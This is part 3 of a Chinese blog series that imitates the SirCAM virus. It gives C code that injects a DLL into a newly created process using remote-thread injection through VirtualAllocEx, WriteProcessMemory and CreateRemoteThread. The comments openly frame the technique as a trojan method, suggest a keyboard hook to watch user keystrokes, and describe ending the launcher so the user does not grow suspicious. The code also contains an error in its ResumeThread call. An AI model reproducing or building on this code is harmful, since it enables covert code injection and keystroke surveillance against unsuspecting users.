仿照SirCAM病毒控制EXE进程(3)

最新推荐文章于 2025-10-22 12:28:42 发布

原创最新推荐文章于 2025-10-22 12:28:42 发布 · 600 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#exe #dll #null #function #thread #winapi

本文详细介绍了如何使用远程线程插入DLL技术将DLL文件注入到指定进程的地址空间中。包括获取进程句柄、分配远程内存、写入DLL路径、创建远程线程并调用LoadLibrary函数等关键步骤。

部署运行你感兴趣的模型镜像

	仿照SirCAM病毒控制EXE进程(3)
Chapter
3

利用得到的用户进程信息插入DLL到进程地址空间

现在我们拿到了用户进程的进程ID、主线程ID，那么使用远程进程插入DLL技术的前提就满足了。

下面的实现步骤比较标准，大家应该熟悉吧，做特洛伊木马常用这个方法。

代码如下：

先在前面声明如下：

// ========== Special for InjectLib =============

#ifdef UNICODE

#define InjectLib InjectLibW

#else

#define InjectLib InjectLibA

#endif // !UNICODE

// ========== Special for InjectLib =============

它们的实现如下：

//------------ My Function ---------------------

BOOL WINAPI InjectLibW(DWORD dwInProcessId, PCWSTR pszLibFile)

{

BOOL bInjectSuccess = TRUE;

//========================== 3.2 ==============================

{

PWSTR pszLibFileRemote = NULL;

HANDLE hCreatingProcess = NULL;

__try

{

// ============== 第一种方案 ===================

// 让新起的进程运行，其中creation flags不去设置CREATE_SUSPENDED,

// 即让进程立即运行。

// 我们的BeforExecute将保持跟踪,一直到该进程结束,

// 这样的好处是可以放入键盘钩子监视用户的按键动作,或者其他,

// 不好的是在任务管理器中可以看到我们的进程从而容易引起怀疑

// Wait until child process exits.

//WaitForSingleObject( pInfo.hProcess, INFINITE );

// Close process and thread handles.

//CloseHandle( pInfo.hProcess );

//CloseHandle( pInfo.hThread );

// ============== 第一种方案 ===================

// ============== 第二种方案 ===================

// 让新起的进程并不马上运行，这是通过设置creation flags为CREATE_SUSPENDED

// 来实现的。

// 即The primary thread of the new process is created in a suspended state,

// and does not run until the ResumeThread function is called.

// 然后我们往新建进程中插入DLL,用来作我们想做的事情!!

// 成功插入之后，我们结束当前自己的进程,只让新建的进程继续跑,这样用户不会怀疑!

// 下面我们使用远程线程来插入DLL

// 1:获得另一个进程的句柄:

hCreatingProcess =

OpenProcess(

PROCESS_QUERY_INFORMATION | // Required by Alpha

PROCESS_CREATE_THREAD | // For CreateRemoteThread

PROCESS_VM_OPERATION | // For VirtualAllocEx/VirtualFreeEx

PROCESS_VM_WRITE, // For WriteProcessMemory

FALSE, dwInProcessId); // dwInProcessId是标示我们创建

// 的进程的唯一进程号

if (hCreatingProcess == NULL)

{

bInjectSuccess = FALSE;

__leave;

}

int cch = 1 + lstrlenW(pszLibFile);

int cb = cch * sizeof(WCHAR);

// 2:使用VirtualAllocEx函数,分配远程进程的地址空间中的内存:

pszLibFileRemote = (PWSTR)

VirtualAllocEx(hCreatingProcess, NULL, cb, MEM_COMMIT, PAGE_READWRITE);

if (pszLibFileRemote == NULL)

{

bInjectSuccess = FALSE;

__leave;

}

// 3:使用WriteProcessMemory函数,将DLL的路径名拷贝到前面已经分配的内存中:

// Copy the DLL's pathname to the remote process's address space

if (!WriteProcessMemory(

hCreatingProcess,

pszLibFileRemote,

(PVOID) pszLibFile,

cb,

NULL)

)

{

bInjectSuccess = FALSE;

__leave;

}

// 4:使用GetProcAddress函数,获得LoadLibraryA或LoadLibraryW函数的

// 实地址(在Kernel32.dll中)

// Get the real address of LoadLibraryW in Kernel32.dll

PTHREAD_START_ROUTINE pfnThreadRtn = (PTHREAD_START_ROUTINE)

GetProcAddress(

GetModuleHandle(TEXT("Kernel32")),

"LoadLibraryW");

if (pfnThreadRtn == NULL)

{

bInjectSuccess = FALSE;

__leave;

}

// 5.使用CreateRemoteThread函数,在远程进程中创建一个线程,

// 她调用正确的LoadLibrary函数,

// 为它传递第2个步骤中分配的内存的地址:

// Create a remote thread that calls LoadLibraryW(DLLPathname)

HANDLE hThread = CreateRemoteThread(

hCreatingProcess,

NULL,

pfnThreadRtn,

pszLibFileRemote,

NULL);

if (hThread == NULL)

{

bInjectSuccess = FALSE;

__leave;

}

// 6.这时,DLL已经被插入远程进程的地址空间中,

// 同时DLL的DllMain函数接收到一个DLL_PROCESS_ATTACH

// 通知,并且能够执行需要的代码。

// 直到现在为止,新建进程才开始运行:

ResumeThread((HANDLE)dwInProcessId);

// Wait for the remote thread to terminate(等不等其实无所谓的)

WaitForSingleObject(hThread, INFINITE);

// ============== 第二种方案 ===================

}

__finally

{

Free the remote memory that contained the DLL's pathname

//if (pszLibFileRemote != NULL)

// VirtualFreeEx(hCreatingProcess, pszLibFileRemote, 0, MEM_RELEASE);

}

return bInjectSuccess;

}

//------------ My Function ---------------------

// 实际上是运行这个InjectLibA，再由它来调用InjectLibW的：

BOOL WINAPI InjectLibA(DWORD dwInProcessId, PCSTR pszLibFile) {

// Allocate a (stack) buffer for the Unicode version of the pathname

PWSTR pszLibFileW = (PWSTR)

_alloca((lstrlenA(pszLibFile) + 1) * sizeof(WCHAR));

// Convert the ANSI pathname to its Unicode equivalent

wsprintfW(pszLibFileW, L"%S", pszLibFile);

// Call the Unicode version of the function to actually do the work.

return(InjectLibW(dwInProcessId, pszLibFileW));

}

//------------ My Function ---------------------

定义好了插入方法，在_tWinMain中调用如下：

//========================== 3.2 ==============================

{

// ============== 第二种方案 ===================

// 下面我们使用远程线程来插入DLL

TCHAR szLibFile[MAX_PATH];

// 得到当前BeforeExecute.exe所在的路径:

GetModuleFileName(NULL, szLibFile, sizeof(szLibFile));

// InjectProcess.DLL是我们要嵌入进程的DLL名称

_tcscpy(_tcsrchr(szLibFile, TEXT('//')) + 1, TEXT("InjectProcess.DLL"));

BOOL bInjectSucess = InjectLib(dwInProcessId, szLibFile);

// ============== 第二种方案 ===================

}

//========================== 3.2 ==============================

好了，大功告成了，我们的名叫“InjectProcess.Dll”的DLL被注入进程，并立即调用，在进程其他线程运行之前。如果你的DllMain的DLL_PROCESS_ATTACH中出了异常而阻塞，那么进程后面的工作就无法展开，所以你一定要慎之又慎！

接下来，我们将制作这个InjectProcess.DLL。

请看下回分解。

-----To be continued------

Trackback: http://tb.blog.youkuaiyun.com/TrackBack.aspx?PostId=12646

您可能感兴趣的与本文相关的镜像

Stable-Diffusion-3.5

图片生成

Stable-Diffusion

Stable Diffusion 3.5 (SD 3.5) 是由 Stability AI 推出的新一代文本到图像生成模型，相比 3.0 版本，它提升了图像质量、运行速度和硬件效率